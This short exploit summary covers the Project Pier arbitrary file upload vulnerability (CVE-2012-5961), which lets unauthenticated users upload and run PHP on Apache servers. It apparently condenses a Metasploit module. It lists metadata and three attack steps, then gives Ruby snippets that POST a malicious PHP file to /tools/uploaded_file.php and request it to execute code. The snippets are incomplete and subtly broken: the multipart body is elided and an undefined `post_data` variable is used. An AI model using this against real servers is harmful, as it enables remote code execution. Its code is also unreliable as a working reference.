## Critical Vulnerability Information - **Vulnerability Name**: Project Pier Arbitrary File Upload Vulnerability - **Description**: This module exploits a vulnerability in Project Pier that allows malicious users to upload arbitrary files to the web server without authentication, and execute remote code. - **Affected Versions**: Project Pier 0.8.1 and earlier - **Affected Servers**: Apache servers (due to how extensions are processed) - **CVE ID**: CVE-2012-5961 - **Release Date**: 2012-10-08 - **Platform**: Linux PHP - **Targets**: - Generic (PHP Payload) - Linux x86 - ARCH_CMD - **Privilege Escalation**: No - **Reliability**: Unknown - **Stability**: Unknown - **Side Effects**: Unknown ### Exploitation Steps 1. **Check Target**: Send a GET request to verify if the target is vulnerable. 2. **Upload File**: Use a POST request to upload a malicious PHP file. 3. **Execute Code**: Access the uploaded PHP file to execute malicious code. ### Related Code Snippets ```ruby def upload_php(base, fname, php_payload, folder_name) data = Multipart::Message.new # Add form data and file res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}/tools/uploaded_file.php", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) return res.body if res end def exec_php(base, body) uri = body.scan(/\/(.+?)\//).flatten[0] res = send_request_raw({ 'uri' => "#{base}/tools#{uri}" }) if res and res.code == 404 print_error('The upload most likely failed') return end end ```